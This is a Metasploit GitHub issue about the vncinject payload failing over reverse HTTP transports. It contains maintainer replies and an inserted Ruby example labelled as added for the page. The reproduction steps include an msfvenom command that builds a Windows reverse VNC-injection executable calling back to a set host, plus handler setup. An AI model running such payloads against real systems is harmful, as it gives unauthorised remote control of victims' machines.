rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

vncinject does not work with reverse_*http* #9720

Open eddieharari opened 6 years ago

eddieharari commented 6 years ago

Steps to reproduce

  1. msfvenom -p windows/x64/vncinject/reverse_winhttp -f exe lhost=192.168.2.115 > /mnt/vnchttp64.exe

  2. msfconsole
     use exploit/multi/handler
     set payload windows/x64/vncinject/reverse_http
     set lhost "IP OF METASPLOIT machine"

  3. Running the vnchttp.exe on a Windows 2012 machine with connectivity to the Metasploit machine

Here are the results:

msf exploit(handler) >
[*] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Staging x64 payload (475136 bytes) ...
[*] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Starting local TCP relay on 127.0.0.1:5900...
[*] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Local TCP relay started.
[*] http://192.168.2.115:8080 handling request from 192.168.2.114; (UUID: qwcvrevo) Launched vncviewer.
[*] VNC connection closed.
/usr/bin/vncviewer: VNC server closed connection

What should happen? VNC session should be open.

What happens instead? The VNC session always breaks because of a server error.

Metasploit version

Framework: 4.16.2-dev
Console : 4.16.2-dev

I installed Metasploit with:

busterb commented 6 years ago

VNC doesn't support HTTP as a transport. Try using reverse_tcp instead. Just checked, it works fine using Tiger VNC as the vncviewer application.

busterb commented 6 years ago

Noted above, it seems like around 2015 the code that prevents this payload combination from appearing in the list stopped blocking it. Still trying to work out what's wrong :/
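To make concrete what "the code that prevents this payload combination from appearing in the list" refers to, here is an added illustration of a stage/stager compatibility filter. This is example code written for this page, not Metasploit's own implementation; the transport naming rule, the STAGE_TRANSPORTS table and the helper names are assumptions made for the example.

```ruby
# Hypothetical compatibility filter (added example, not Metasploit's own code).
# A staged payload name has the form "<platform>/<stage>/<stager>", e.g.
# "windows/x64/vncinject/reverse_winhttp". Each stage declares which stager
# transports it can actually run over, and payloads whose stager uses an
# unsupported transport are dropped from the offered list.

# Map a stager name to its transport family. Assumption for this example:
# any stager name containing "http" is HTTP-family, everything else is plain TCP.
def stager_transport(stager)
  stager.include?('http') ? :http : :tcp
end

# Transports each stage supports (constructed for this example; vncinject is
# listed as TCP-only, matching the maintainer's statement in this thread).
STAGE_TRANSPORTS = {
  'vncinject'   => [:tcp],
  'meterpreter' => [:tcp, :http],
}.freeze

# Split a full payload name into [platform prefix, stage, stager].
def split_payload(name)
  parts = name.split('/')
  [parts[0..-3].join('/'), parts[-2], parts[-1]]
end

# A payload is compatible when its stage lists the stager's transport.
def compatible?(name)
  _prefix, stage, stager = split_payload(name)
  allowed = STAGE_TRANSPORTS[stage]
  return false if allowed.nil?
  allowed.include?(stager_transport(stager))
end

# Return only the payloads that should be offered to the user.
def filter_payloads(names)
  names.select { |n| compatible?(n) }
end

# Constructed candidate list for demonstration.
CANDIDATES = [
  'windows/x64/vncinject/reverse_tcp',
  'windows/x64/vncinject/reverse_winhttp',
  'windows/x64/vncinject/reverse_http',
  'windows/x64/meterpreter/reverse_http',
].freeze

if __FILE__ == $PROGRAM_NAME
  # Prints only the TCP vncinject payload and the meterpreter HTTP payload.
  puts filter_payloads(CANDIDATES)
end
```

With this rule in place the two vncinject/HTTP combinations from the reproduction steps would never be listed, which is the behaviour the maintainer says was lost.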

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.